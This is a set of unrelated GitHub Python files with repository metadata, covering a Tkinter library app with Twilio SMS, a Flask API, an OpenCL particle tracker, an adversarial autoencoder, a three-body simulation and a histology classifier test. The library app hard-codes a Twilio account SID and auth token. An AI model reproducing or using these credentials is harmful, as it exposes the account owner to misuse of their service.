        user = database.child("BorrowerList").get().val()
        print(user)
        pdf = FPDF()
        for i in user:
            contact = database.child("Users").child(i).child("PhoneNumber").get().val()
            isbn = database.child("BorrowerList").child(i).get().val()
            pdf.add_page()
            pdf.set_font("Arial", size=15)
            pdf.cell(200, 10, txt=f"Phone Number -> {contact}", ln=1, align='L')
            for j in isbn:
                for k in isbn[j]:
                    pdf.set_font("Arial", size=15)
                    pdf.cell(200, 10, txt=f"{k} -> {isbn[j][k]}", ln=1, align='L')
        pdf.output("BorrowedUsers.pdf")
        messagebox.showinfo('Success', "PDF saved Successfully")
    except:
        # NOTE(review): bare except also masks PDF/IO errors.
        messagebox.showerror('Error', "No Borrowers.")
def pdf_returner():
    """Export the current ReturnerList to ReturnedUsers.pdf.

    Mirrors pdf_borrower(): one page per returner with phone number header
    and all fields of every returned book.
    """
    try:
        user = database.child("ReturnerList").get().val()
        print(user)
        pdf = FPDF()
        for i in user:
            contact = database.child("Users").child(i).child("PhoneNumber").get().val()
            isbn = database.child("ReturnerList").child(i).get().val()
            pdf.add_page()
            pdf.set_font("Arial", size=15)
            pdf.cell(200, 10, txt=f"Phone Number -> {contact}", ln=1, align='L')
            for j in isbn:
                for k in isbn[j]:
                    pdf.set_font("Arial", size=15)
                    pdf.cell(200, 10, txt=f"{k} -> {isbn[j][k]}", ln=1, align='L')
        pdf.output("ReturnedUsers.pdf")
        messagebox.showinfo('Success', "PDF saved Successfully")
    except:
        # NOTE(review): bare except also masks PDF/IO errors.
        messagebox.showerror('Error', "No Returners.")
def sends_notification():
    """Open the notification window and send an SMS to a user via Twilio.

    Looks up the user's phone number in Firebase by username, then sends
    the typed message through the Twilio REST API (+91 country code).
    """
    # NOTE(review): Twilio credentials are hard-coded in source; move them
    # to configuration/environment and rotate.
    account_sid = "ACed4fd4cfe8ff5ff41c72977ac2366eb4"
    auth_token = "a7dac4f9f6a0f0f74b2ed4f874d92cb8"
    client = Client(account_sid, auth_token)
    def sendSMS(msg, phone):
        # Fire one SMS; the "to" number is prefixed with India's +91.
        message = client.messages.create(
            body=msg,
            from_="+15673131780",
            to="+91" + str(phone)
        )
        print(message.sid)
        messagebox.showinfo('Success', "Message Sent Successfully")
    def send_data():
        # Handler for the Send button / Return key.
        if name.get() == "" or message.get() == "":
            messagebox.showerror('Error', "All fields are required")
        else:
            try:
                contact = database.child("Users").child(name.get()).child("PhoneNumber").get().val()
                if contact is not None:
                    msg = message.get()
                    sendSMS(msg, contact)
                else:
                    messagebox.showerror('Error', "No username matches the Database.", parent=send_window)
            except:
                messagebox.showerror('Error', "Cannot send the message right now.", parent=send_window)
            finally:
                # Window is closed whether or not the send succeeded.
                send_window.destroy()
    send_window = Tk()
    send_window.title('Send Notifications')
    send_window.geometry('500x600')
    heading = Label(send_window, text="Notification Center", font=('Times New Roman', 20, 'bold'))
    heading.place(x=80, y=60)
    # NOTE(review): name/message are rebound Label -> StringVar -> Entry;
    # send_data() reads the Entry widgets via .get().
    name = Label(send_window, text="Username :", font='Verdana 10 bold')
    name.place(x=80, y=160)
    message = Label(send_window, text="message :", font='Verdana 10 bold')
    message.place(x=80, y=190)
    name = StringVar()
    message = StringVar()
    name = Entry(send_window, width=40, textvariable=name)
    name.place(x=200, y=163)
    message = Entry(send_window, width=40, textvariable=message)
    message.place(x=200, y=193)
    btn_signup = Button(send_window, text=" Send", font=('Bookman antiqua', 12, 'bold'), command=send_data,
                        bg='#2176F2',
                        fg='white')
    btn_signup.place(x=200, y=313)
    send_window.bind('<Return>', lambda event: send_data())
    send_window.mainloop()
| sridamul/BBMS | userManagement.py | userManagement.py | py | 11,961 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "db_read.database.child",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "db_read.database",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "fpdf.FPDF",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox.... |
42412749367 | from flask import Flask, Response, jsonify
from Flask_PoolMysql import func
# Instantiate the Flask application object
app = Flask(__name__)
app.config.from_pyfile('config.py')
class JsonResponse(Response):
    """Response subclass that converts plain dict return values to JSON.

    Flask calls force_type only when a view returns something that is not
    a string, tuple or Response object, so a view may simply return a
    dict and have it serialized transparently.
    """
    @classmethod
    def force_type(cls, response, environ=None):
        # jsonify serializes the dict AND wraps it in a Response object.
        converted = jsonify(response) if isinstance(response, dict) else response
        return super(JsonResponse, cls).force_type(converted, environ)
app.response_class = JsonResponse
# Register the mapping between '/' and the index() function in the routing table
@app.route('/')
def index():
    """Root view: all book rows plus per-subgroup counts, as JSON."""
    books = func('select * from book')
    group_counts = func('select subgroup,count(*) from book group by subgroup')
    return {'first': books, 'twice': group_counts}
@app.route('/get')
def get():
    """Return 15 randomly selected study questions with their answers."""
    topic_rows = func('select s.questionid,s.level,content,answer from question r join (select questionid,level from study order by RAND() limit 15) s on r.questionid = s.questionid')
    return {'topic': topic_rows}
if __name__ == '__main__':
    # Listen for user requests.
    # When a request arrives, app's __call__ method (the WSGI entry
    # point) is invoked to handle it.
    app.run()
| loingjuzy/learn-flask | Flask_T1.py | Flask_T1.py | py | 1,397 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "flask.Response",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "Flask_PoolMysql.func",
"li... |
41865132711 | from __future__ import absolute_import, print_function
import os
import numpy as np
import pyopencl as cl
os.environ['PYOPENCL_COMPILER_OUTPUT']='1'
modulepath=os.path.dirname(os.path.abspath(__file__))
class Particles(object):
    """Zero-initialised flat storage for particle phase-space coordinates.

    The buffer holds ``nparticles * ndim`` float64 values in a single
    contiguous 1-D array.
    """
    def __init__(self, nparticles=1, ndim=10):
        self.nparticles = nparticles
        self.ndim = ndim
        total = nparticles * ndim
        self.data = np.zeros(total, dtype=np.float64)
class Elements(object):
    """Flat machine description: lattice elements serialized into one buffer.

    Every slot of ``data`` is 8 bytes that can be viewed as float64, int64
    or uint64 through the overlapping-union dtype ``value_t``.  ``elements``
    records the start offset of each appended element; ``last`` is the next
    free slot.
    """
    # 8-byte union view: the same slot readable as f64, i64 or u64.
    value_t = np.dtype({'names' :['f64','i64','u64'],
                        'formats':['<f8','<i8','<u8'],
                        'offsets':[ 0, 0, 0],
                        'itemsize':8})
    DriftId=1
    MultipoleId=2
    def __init__(self,size=40000):
        self.size=size
        self.data=np.zeros(size,dtype=self.value_t)
        self.last=0       # next free slot in ``data``
        self.elements=[]  # start offset of each appended element
    def add_drift(self,length=0.0):
        """Append a drift: layout [DriftId(u64), length(f64)]."""
        self.elements.append(self.last)
        self.data['u64'][self.last  ]=self.DriftId
        self.data['f64'][self.last+1]=length
        self.last+=2
    def add_multipole(self,knl=(),ksl=(),length=0.0,hxl=0.0,hyl=0.0):
        """Append a multipole.

        Layout: [MultipoleId(u64), order(u64), length, hxl, hyl,
        knl[0]/0!, ksl[0]/0!, knl[1]/1!, ksl[1]/1!, ...] with the strength
        pairs interleaved.  Defaults are tuples to avoid the mutable
        default-argument pitfall (callers may still pass lists).
        """
        self.elements.append(self.last)
        order=max(len(knl),len(ksl))
        self.data['u64'][self.last+0]=self.MultipoleId
        self.data['u64'][self.last+1]=order
        # length/hxl/hyl are floats: store them through the 'f64' view.
        # (Writing them into the 'u64' field truncated them to integers.)
        self.data['f64'][self.last+2]=length
        self.data['f64'][self.last+3]=hxl
        self.data['f64'][self.last+4]=hyl
        fact=1
        for nn in range(len(knl)):
            self.data['f64'][self.last+5+nn*2]=knl[nn]/fact
            fact*=nn+1
        fact=1
        for nn in range(len(ksl)):
            self.data['f64'][self.last+5+nn*2+1]=ksl[nn]/fact
            fact*=nn+1
        # Footprint is the 5-slot header plus 2 slots per order
        # (previously advanced by 5*2*order, overshooting the element and,
        # for order 0, not advancing at all).
        self.last+=5+2*order
particles=Particles(nparticles=2560,ndim=10)
elements=Elements()
class SixTrackCL(object):
    """OpenCL tracker: uploads particle/element buffers and runs the kernel."""
    # Buffer creation flags; both initialise device memory from the host array.
    ro=cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR
    rw=cl.mem_flags.READ_WRITE | cl.mem_flags.COPY_HOST_PTR
    def __init__(self,particles,elements,device=["0"]):
        """Create the context/queue/buffers and compile the kernel source.

        particles: Particles instance (host coordinate buffer)
        elements:  Elements instance (serialized machine description)
        device:    answers forwarded to pyopencl's context chooser
        """
        self.particles=particles
        self.elements=elements
        srcpath='-I%s'%modulepath
        self.ctx = cl.create_some_context(answers=device)
        self.queue = cl.CommandQueue(self.ctx)
        self.particles_g = cl.Buffer(self.ctx, self.rw, hostbuf=particles.data)
        self.elements_g = cl.Buffer(self.ctx, self.ro, hostbuf=elements.data)
        # Close the kernel-source file promptly instead of leaking the handle.
        with open(os.path.join(modulepath,'sixtracklib_cl.c')) as fh:
            src=fh.read()
        self.prg=cl.Program(self.ctx,src).build(options=[srcpath])
    def track(self,nturns,elemids):
        """Track all particles through the elements in ``elemids`` for
        ``nturns`` turns, then copy the coordinates back to the host.

        Fixes several NameErrors in the original (self.elemids, elem_ids,
        queue, npart and particles were all undefined here).
        """
        elemids=np.array(elemids,dtype='uint64')
        elemids_g=cl.Buffer(self.ctx, self.rw, hostbuf=elemids)
        nelems=np.int64(len(elemids))
        nturns=np.int64(nturns)
        # One work-item per particle.
        self.prg.elements_track(self.queue,[self.particles.nparticles],None,
                self.elements_g, elemids_g, nelems,
                nturns,
                self.particles_g)
        cl.enqueue_copy(self.queue,self.particles.data,self.particles_g)
| rdemaria/sixtracklib_gsoc18 | studies/study1/sixtracklib.py | sixtracklib.py | py | 2,937 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line... |
72806130663 | # -*- coding: utf-8 -*-
"""
Created on Tue Oct 2 17:51:41 2018
@author: USER
"""
import sys
sys.path.append('..')
import os
import torch
import torch.nn as nn
import numpy as np
import utils.general as utils
import utils.adversarial_ae as ae_utils
from adverse_AE import Adversarial_AE, Discriminator
import torchvision
import torch.optim as optim
if __name__ == '__main__':
    # Hyper-parameters.
    epochs = 50
    batch_size = 100
    latent_dim = 2
    reg = True  # NOTE(review): never read below
    dataloader = utils.get_dataloader(batch_size, pad = False)
    device = utils.get_device()
    step_per_epoch = np.ceil(dataloader.dataset.__len__() / batch_size)

    sample_dir = './samples'
    checkpoint_dir = './checkpoints'
    utils.makedirs(sample_dir, checkpoint_dir)

    AE = Adversarial_AE(latent_dim = latent_dim).to(device)
    D = Discriminator(latent_dim = latent_dim).to(device)

    ae_optim = optim.Adam(AE.parameters())
    d_optim = optim.Adam(D.parameters())

    rec_log = []
    d_log = []
    rec_criterion = nn.MSELoss().to(device)
    discrim_criterion = nn.BCELoss().to(device)

    result = None
    for epoch_i in range(1, epochs + 1):
        for step_i, (img, _) in enumerate(dataloader):
            N = img.shape[0]
            real_label = torch.ones(N).to(device)
            fake_label = torch.zeros(N).to(device)
            # BUGFIX: size the soft labels by the ACTUAL batch size N, not
            # by the configured batch_size -- a short final batch would
            # make discrim_criterion fail on mismatched shapes.
            soft_label = torch.Tensor(N).uniform_(0.9, 1).to(device)
            img = img.view(N, -1).to(device)
            # Keep the first batch around to visualise reconstructions.
            if result is None:
                result = img
            # Reconstruction phase: train encoder+decoder on MSE.
            reconstructed = AE(img)
            loss = rec_criterion(reconstructed, img)
            ae_optim.zero_grad()
            loss.backward()
            ae_optim.step()
            rec_log.append(loss.item())
            # Discriminator phase: real prior samples vs encoded codes.
            z = torch.randn(N, latent_dim).to(device)
            code = AE.encoder(img)
            fake_score = D(code)
            real_score = D(z)
            real_loss = discrim_criterion(real_score, soft_label)
            fake_loss = discrim_criterion(fake_score, fake_label)
            loss = real_loss + fake_loss
            d_optim.zero_grad()
            loss.backward()
            d_optim.step()
            d_log.append(loss.item())
            # Generator phase: push the encoder's codes towards "real".
            code = AE.encoder(img)
            fake_score = D(code)
            loss = discrim_criterion(fake_score, real_label)
            ae_optim.zero_grad()
            loss.backward()
            ae_optim.step()
            utils.show_process(epoch_i, step_i + 1, step_per_epoch, rec_log, d_log)
            if epoch_i == 1:
                torchvision.utils.save_image(result.reshape(-1, 1, 28, 28),
                                             os.path.join(sample_dir, 'orig.png'),
                                             nrow = 10)
            reconstructed = AE(result)
            # NOTE(review): images and checkpoints are written EVERY step,
            # which is expensive; kept as-is to preserve behavior.
            utils.save_image(reconstructed.reshape(-1, 1, 28, 28), 10, epoch_i,
                             step_i + 1, sample_dir)
            utils.save_model(AE, ae_optim, rec_log, checkpoint_dir, 'AE.ckpt')
            utils.save_model(D, d_optim, d_log, checkpoint_dir, 'D.ckpt')
    ae_utils.plot_manifold(AE.encoder, device, dataloader.dataset,
                           dataloader.dataset.__len__(), sample_dir)
| bchao1/Fun-with-MNIST | Adversarial_Autoencoder/train.py | train.py | py | 3,559 | python | en | code | 23 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "utils.general.get_dataloader",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "utils.genera... |
12852390478 | # An implementation of the three-body problem by Logan Schmalz
# https://github.com/LoganSchmalz/threebody/
# MIT License
import numpy as np
import scipy as sci
import scipy.integrate
import scipy.linalg
import matplotlib.pyplot as plt
# As astronomers, we like to normalize values to scales that make sense
# So that's what we'll do here
# Using these norm values, we will compute some constants that make multiplying easier
# This will also speed up calculations, since we will use floating-point numbers
# as opposed to fixed point, which are slower with big differences in exponents
# Physical constants and normalization scales (SI units).
G = 6.67408e-11  # gravitational constant, N*m^2/kg^2
m_norm = 1.989e30  # reference mass: one solar mass, kg
r_norm = 1.496e11  # reference length: one AU, m
v_norm = 29780  # reference speed: Earth's orbital speed, m/s
t_norm = 1 * 365 * 24 * 3600  # reference time: one year, s

# Dimensionless coupling constants for the normalized equations of motion.
K1 = G * t_norm * m_norm / (r_norm**2 * v_norm)
K2 = v_norm * t_norm / r_norm


def body_calc(rvs, t, m1, m2, m3):
    """Right-hand side of the normalized three-body ODE system.

    Parameters
    ----------
    rvs : array-like of 18 floats
        Flattened state [r1, r2, r3, v1, v2, v3] in normalized units.
    t : float
        Current time; unused, but required by scipy.integrate.odeint.
    m1, m2, m3 : float
        Body masses in units of the solar mass.

    Returns
    -------
    numpy.ndarray of 18 floats
        Time derivatives [dr1, dr2, dr3, dv1, dv2, dv3].
    """
    # Unpack the flattened state into per-body positions and velocities.
    r1, r2, r3 = rvs[:3], rvs[3:6], rvs[6:9]
    v1, v2, v3 = rvs[9:12], rvs[12:15], rvs[15:18]

    # Pairwise separation distances.
    d12 = sci.linalg.norm(r1 - r2)
    d23 = sci.linalg.norm(r2 - r3)
    d13 = sci.linalg.norm(r1 - r3)

    # Newtonian gravitational accelerations in normalized units.
    dv1 = K1 * (m2 * (r2 - r1) / d12**3 + m3 * (r3 - r1) / d13**3)
    dv2 = K1 * (m1 * (r1 - r2) / d12**3 + m3 * (r3 - r2) / d23**3)
    dv3 = K1 * (m1 * (r1 - r3) / d13**3 + m2 * (r2 - r3) / d23**3)

    # Position derivatives are just the (scaled) velocities.
    return np.concatenate((K2 * v1, K2 * v2, K2 * v3, dv1, dv2, dv3))
# Initial conditions in normalized units: positions in AU, velocities in
# units of Earth's orbital speed, masses in solar masses.
# Sun
r1 = np.array([0,0,0])
v1 = np.array([0,0,0])
m1 = 1
# Venus
r2 = np.array([0,0.723332,0])
v2 = np.array([1.176,0,0])
#v2=np.array([2.352,0,0]) # twice Venus' normal velocity
m2 = 2.4472e-6
# Earth
r3 = np.array([1,0,0])
v3 = np.array([0,1,0])
m3 = 3.00269e-6
# Alternative scenario (commented out): equal masses at the points of an
# equilateral triangle with velocities following the edges
#m1 = m2 = m3 = 1
#r1 = np.array([0,0,0])
#r2 = np.array([1,0,0])
#r3 = np.array([0.5,np.sqrt(1-0.5**2),0])
#v1 = np.array([.5,0,0])
#v2 = np.array([-0.25,np.sqrt(3)/4,0])
#v3 = np.array([-0.25,-np.sqrt(3)/4,0])
# combining all of our arrays into one flat 18-vector to pass into our ODE solver
init_rvs = np.concatenate((r1, r2, r3, v1, v2, v3))
# generates a linear progression of times from 0 to 20
# the units are technically years, but the 0-20 years is divided
# into 10,000 intervals, so these are 0.002 years, or about 17.5 hours
times = np.linspace(0,20,10000)
# We use odeint as it is typically faster than solve_ivp, due to underlying
# implementation differences, even though the newer interface is more
# versatile
solution = sci.integrate.odeint(body_calc, init_rvs, times, args=(m1,m2,m3))
# Here we want to extract out position values at each time step
#
# Explanation:
#
# Solutions is a multidimensional array, we can think of it as
# a Cx6 matrix, where C is some constant for how many time steps we have
# the 6 comes from our 6 values (r1, r2, r3, v1, v2, and v3)
# these values themselves are 3-dimensional vectors
# In reality, the 6 dimensions and 3 dimensions are actually 'flattened' into
# one 18-dimensional vector.
#
# So for r1_sol for example:
# we want the first 3 values of our 18-dimensional vector
# which correspond to x1,y1,z1
# and these values at each timestep appear in all C
# so we use " : " to say that we want to be checking every C timestep
# and we use " :3" to say we want the first 3 values (again, x1,y1,z1).
#
# for r2_sol:
# we again want every value at each timestep, so we start with " : "
# and we use "3:6" to say we want the 4th, 5th, and 6th values (x2,y2,z2)
#
# similarly for r3_sol, we use "6:9" to get 7th, 8th, and 9th values
# if we wanted v1, we could use "9:12", but that's not very useful for us
#
# (note: in Python, arrays begin indexing at 0, thus for example the value
# in index 2 is the third value.
# in this sense, we can say " :3" is the same as writing "0:3", with the end
# being non-inclusive, so we get a0,a1,a2
# and for "3:6", we get a3,a4,a5)
# (extra note: the technical reason that it makes sense to allow a comma here
# is that numpy arrays can actually take a "tuple" of slice boundaries)
# Extract the per-body position histories from the (C x 18) solution matrix;
# columns 0:3 are body 1, 3:6 body 2, 6:9 body 3 (see the explanation above).
r1_sol = solution[ : , :3]
r2_sol = solution[ : , 3:6]
r3_sol = solution[ : , 6:9]
fig = plt.figure()
axs = fig.add_subplot(111)
# Plotting the objects' paths (x vs y only; z is ignored).
# Similarly here, we extract the first, second, third coordinates
# using " : " to go through every timestep, and then 0, 1, 2 as
# the index for which coordinate we want: 0=x, 1=y, 2=z.
# Colors: Sun orange, Venus gray, Earth blue.
axs.plot(r1_sol[ : , 0], r1_sol[ : , 1], color="#ffa500")
axs.plot(r2_sol[ : , 0], r2_sol[ : , 1], color="#808080")
axs.plot(r3_sol[ : , 0], r3_sol[ : , 1], color="b")
# Plotting the objects' final locations as markers
# and the -1 here means get final timestep
axs.scatter(r1_sol[-1,0], r1_sol[-1,1], color="#ffa500")
axs.scatter(r2_sol[-1,0], r2_sol[-1,1], color="#808080")
axs.scatter(r3_sol[-1,0], r3_sol[-1,1], color="b")
plt.show()
| LoganSchmalz/threebody | threebody.py | threebody.py | py | 5,543 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scipy.linalg.norm",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "scipy.linalg",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "scipy.linalg.norm",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "scipy.linalg",
... |
35515239669 | import argparse
from datetime import datetime
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data
from model import Model
from dataset import Dataset
from tqdm import tqdm
from sklearn.metrics import confusion_matrix, roc_curve, auc
import numpy as np
import matplotlib.pyplot as plt
from sklearn import metrics
# ---------------------------------------------------------------------------
# Command-line arguments.
# ---------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Test a trained multi-resolution gland classification model.')
parser.add_argument('--init_model_file', default='',help='Initial model file (optional)', dest='init_model_file')
parser.add_argument('--image_dir_high', default='../../Images/gland_classification/cropped_patches__complete_and_partial_glands_50_25_512', help='Image directory', dest='image_dir_high')
parser.add_argument('--image_dir_medium', default='../../Images/gland_classification/cropped_patches__complete_and_partial_glands_50_50_512', help='Image directory', dest='image_dir_medium')
parser.add_argument('--image_dir_low', default='../../Images/gland_classification/cropped_patches__complete_and_partial_glands_50_100_512', help='Image directory', dest='image_dir_low')
parser.add_argument('--image_dir_low2', default='../../Images/gland_classification/cropped_patches__complete_and_partial_glands_50_200_512', help='Image directory', dest='image_dir_low2')
parser.add_argument('--slide_list_filename_test', default='../dataset/slide_ids_list_gland_classification_46_slides_test_saved.txt', help='slide list test', dest='slide_list_filename_test')
parser.add_argument('--dataset_type', default='test', help='', dest='dataset_type')
parser.add_argument('--num_classes', default='2', type=int, help='Number of classes', dest='num_classes')
parser.add_argument('--batch_size', default='32', type=int, help='Batch size', dest='batch_size')
parser.add_argument('--metrics_file', default='test_metrics', help='Text file to write test metrics', dest='metrics_file')
FLAGS = parser.parse_args()

# Derive a model name from the checkpoint filename.
# NOTE(review): assumes the checkpoint basename carries a 15-character prefix
# and a 4-character extension around the model name -- confirm with the trainer.
model_name = FLAGS.init_model_file.split('/')[-1][15:-4]

# Output directory: one folder per model / dataset-type combination.
out_dir = '{}/{}/{}'.format(FLAGS.metrics_file,model_name,FLAGS.dataset_type)
if not os.path.exists(out_dir):
    os.makedirs(out_dir)
test_metrics_file = '{}/test_scores__{}.txt'.format(out_dir,model_name)

# Write a run-configuration header; per-image rows are appended in the loop below.
with open(test_metrics_file, 'w') as f:
    f.write('# model_name: {}\n'.format(model_name))
    f.write('# init_model_file: {}\n'.format(FLAGS.init_model_file))
    f.write('# image_dir_high: {}\n'.format(FLAGS.image_dir_high))
    f.write('# image_dir_medium: {}\n'.format(FLAGS.image_dir_medium))
    f.write('# image_dir_low: {}\n'.format(FLAGS.image_dir_low))
    f.write('# image_dir_low2: {}\n'.format(FLAGS.image_dir_low2))
    f.write('# slide_list_filename_test: {}\n'.format(FLAGS.slide_list_filename_test))
    f.write('# num_classes: {}\n'.format(FLAGS.num_classes))
    f.write('# batch_size: {}\n'.format(FLAGS.batch_size))
    f.write('# metrics_file: {}\n'.format(test_metrics_file))
    f.write('# patient_id\tslide_id\timage_id\tlabel\tprediction\tscore_benign\tscore_malignant\n')

# Echo the configuration to stdout.
print('model_name: {}'.format(model_name))
print('init_model_file: {}'.format(FLAGS.init_model_file))
print('image_dir_high: {}'.format(FLAGS.image_dir_high))
print('image_dir_medium: {}'.format(FLAGS.image_dir_medium))
print('image_dir_low: {}'.format(FLAGS.image_dir_low))
print('image_dir_low2: {}'.format(FLAGS.image_dir_low2))
print('slide_list_filename_test: {}'.format(FLAGS.slide_list_filename_test))
print('num_classes: {}'.format(FLAGS.num_classes))
print('batch_size: {}'.format(FLAGS.batch_size))
print('metrics_file: {}'.format(test_metrics_file))

# Dataset yielding the same patch at four magnifications plus its label.
test_dataset = Dataset(img_dir_high=FLAGS.image_dir_high, img_dir_medium=FLAGS.image_dir_medium, img_dir_low=FLAGS.image_dir_low, img_dir_low2=FLAGS.image_dir_low2, slide_list_filename=FLAGS.slide_list_filename_test, transforms=False)
num_imgs_test = test_dataset.num_imgs
print("Test Data - num_imgs: {}".format(test_dataset.num_imgs))

# define data loaders (no shuffling so rows line up with the dataset order)
data_loader_test = torch.utils.data.DataLoader(test_dataset, batch_size=FLAGS.batch_size, shuffle=False, num_workers=1)

device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')

# get the model using our helper function
model = Model(pretrained=False, num_classes=FLAGS.num_classes, num_intermediate_features=64)
# move model to the right device
model.to(device)

# Restore trained weights (map_location keeps CPU-only machines working).
if FLAGS.init_model_file:
    if os.path.isfile(FLAGS.init_model_file):
        state_dict = torch.load(FLAGS.init_model_file, map_location=lambda storage, loc: storage)
        model.load_state_dict(state_dict['model_state_dict'])
        print("Model weights loaded successfully from file: ", FLAGS.init_model_file)

print('******************** testing ********************')
pbar = tqdm(total=len(data_loader_test))

# Running counters and per-image accumulators for the metrics below.
num_predictions = 0
running_correct_result = 0
label_list = []
predicted_result_list = []
probs_result_list = []

model.eval()
with torch.no_grad():
    for i, (img_paths, img_high, img_medium, img_low, img_low2, label) in enumerate(data_loader_test):
        img_high, img_medium, img_low, img_low2, label = img_high.to(device), img_medium.to(device), img_low.to(device), img_low2.to(device), label.to(device)
        # get logits from the model (only the fused "result" head is scored here)
        output_high, output_medium, output_low, output_low2, output_result = model(img_high, img_medium, img_low, img_low2)
        # obtain probs
        probs_result = F.softmax(output_result, dim=1)
        # obtain predictions
        _, predicted_result = torch.max(output_result, 1)
        correct_result = (predicted_result == label).sum().item()
        running_correct_result += correct_result
        label_arr = label.cpu().numpy()
        predicted_result_arr = predicted_result.cpu().numpy()
        probs_result_arr = probs_result.cpu().numpy()
        temp_num_predictions = label_arr.shape[0]
        num_predictions += temp_num_predictions
        label_list += list(label_arr)
        predicted_result_list += list(predicted_result_arr)
        probs_result_list += list(probs_result_arr)
        # Append one scored row per image; patient/slide/image ids are parsed
        # from the image path (assumes .../patient_<id>_slide_<id>/.../<img>.ext).
        for idx in range(temp_num_predictions):
            with open(test_metrics_file, 'a') as f:
                temp_img_path = img_paths[0][idx]
                patient_id = temp_img_path.split('/')[-3].split('_')[1]
                slide_id = temp_img_path.split('/')[-3].split('_')[3]
                img_id = temp_img_path.split('/')[-1].split('.')[0]
                f.write('{}\t{}\t{}\t{}\t{}\t{:0.4f}\t{:.4f}\n'.format(patient_id, slide_id, img_id, label_arr[idx], predicted_result_arr[idx], probs_result_arr[idx, 0], probs_result_arr[idx, 1]))
        pbar.update(1)
pbar.close()

# Overall accuracy.
test_acc_result = running_correct_result / num_predictions
print('test_acc_result:{:.4f}'.format(test_acc_result))
# confusion matrix
cm_test = confusion_matrix(label_list, predicted_result_list, labels=[0,1])
print('cm_test:{}'.format(cm_test))
# per-class accuracy: TPR and TNR
class_acc_test = cm_test.diagonal() / cm_test.sum(1)
print('TNR:{:.4f}, TPR:{:.4f}'.format(class_acc_test[0],class_acc_test[1]))
# Receiver operating characteristic curve and area under curve value
# (uses the positive/malignant class probability, column 1)
label_arr = np.array(label_list)
probs_result_arr = np.vstack(probs_result_list)
fpr, tpr, _ = roc_curve(label_arr, probs_result_arr[:,1])
roc_auc = auc(fpr, tpr)

# Write a one-file summary of all metrics for this run.
test_metrics_summary_file = '{}/test_metrics_summary__{}.txt'.format(out_dir,model_name)
with open(test_metrics_summary_file, 'w') as f:
    f.write('# model_name: {}\n'.format(model_name))
    f.write('# init_model_file: {}\n'.format(FLAGS.init_model_file))
    f.write('# image_dir_high: {}\n'.format(FLAGS.image_dir_high))
    f.write('# image_dir_medium: {}\n'.format(FLAGS.image_dir_medium))
    f.write('# image_dir_low: {}\n'.format(FLAGS.image_dir_low))
    f.write('# image_dir_low2: {}\n'.format(FLAGS.image_dir_low2))
    f.write('# slide_list_filename_test: {}\n'.format(FLAGS.slide_list_filename_test))
    f.write('# num_classes: {}\n'.format(FLAGS.num_classes))
    f.write('# batch_size: {}\n'.format(FLAGS.batch_size))
    f.write('# test_metrics_summary_file: {}\n'.format(test_metrics_summary_file))
    f.write('# test_acc_result\n')
    f.write('{:.4f}\n'.format(test_acc_result))
    f.write('# cm_test: cm_test[0,0]\tcm_test[0,1]\tcm_test[1,0]\tcm_test[1,1]\n')
    f.write('{:d}\t{:d}\t{:d}\t{:d}\n'.format(cm_test[0,0],cm_test[0,1],cm_test[1,0],cm_test[1,1]))
    f.write('# TNR\tTPR\n')
    f.write('{:.4f}\t{:.4f}\n'.format(class_acc_test[0],class_acc_test[1]))
    f.write('# roc_auc\n')
    f.write('{:.4f}\n'.format(roc_auc))

# Render the ROC curve to PNG and PDF.
plt.rcParams.update({'font.size':12,'axes.labelsize':12})
fig,ax = plt.subplots(figsize=(3,3))
lw = 2
ax.plot(fpr, tpr, color='darkorange', lw=lw, label='AUROC = %0.2f' % roc_auc)
ax.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
ax.set_xlim([-0.05, 1.05])
ax.set_xticks(np.arange(0,1.05,0.2))
ax.set_ylim([-0.05, 1.05])
ax.set_yticks(np.arange(0,1.05,0.2))
ax.set_xlabel('FPR')
ax.set_ylabel('TPR')
ax.set_title('AUROC = %0.4f' % roc_auc)
# ax.legend(loc='lower right')
ax.grid()
fig.tight_layout()
fig_filename = '{}/ROC__{}.png'.format(out_dir,model_name)
fig.savefig(fig_filename, dpi=200)
fig_filename = '{}/ROC__{}.pdf'.format(out_dir,model_name)
fig.savefig(fig_filename, dpi=200)
# plt.show()
plt.close('all')
| onermustafaumit/MLNM | gland_classification/four_resolutions_model/test.py | test.py | py | 9,294 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
... |
9856058749 | import re
import csv
import os
import sys
import pickle
from pprint import pprint
from enum import Enum
sys.path.insert(0, '../heatmap')
sys.path.insert(0, '../tests')
from stat_type_lookups import *
from tester import *
# Types of files:
# Fundamental files
# - PlayByPlay.csv, GameIDs.csv, BoxscoreStats.csv
# - Run after scraper
# - Generate pickles right after
# Enriched
# - PlayByPlay_enriched.csv
# - Run during enrich
# - Generate pickle right after
# Heatmap Stats
# - *_heatmap.csv
# - Run for relevent stats (can be all), for specific games and teams
# - Generate pickles right after
# Lineups
# - lineups_*.csv
# - That's up to Rossdan (assume it's his problem)
class CSVTypes(Enum):
